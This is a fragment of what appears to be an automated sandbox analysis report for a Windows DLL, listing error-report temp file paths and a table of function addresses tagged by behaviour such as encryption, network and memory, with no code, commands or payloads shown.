C:\ProgramData\Microsoft\Windows\WER\Temp\WERF4BF.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF740.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF8A9.tmp.xml

Static File Info

General

File Icon

Static PE Info

Windows Analysis Report
62835e34e60c1.dll

Function 00401340 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79
COMMON

Function 044B5FBB Relevance: 18.2, APIs: 12, Instructions: 163
encryptionCOMMON

Function 00401308 Relevance: 13.6, APIs: 9, Instructions: 120
sleepnativesynchronizationCOMMON

Function 00401C83 Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Function 044B3365 Relevance: 12.1, APIs: 8, Instructions: 103
memoryCOMMON

Function 044B4321 Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Function 044B1CA5 Relevance: 9.1, APIs: 6, Instructions: 124
filenetworkCOMMON

Function 00401000 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Function 00402067 Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Function 044B56C8 Relevance: 39.2, APIs: 26, Instructions: 234
memorystringCOMMON

Function 044B7AF1 Relevance: 19.6, APIs: 13, Instructions: 126
networkstringCOMMON

Function 044B7F35 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209
libraryCOMMON

Function 044B661D Relevance: 16.7, APIs: 11, Instructions: 151
timememoryCOMMON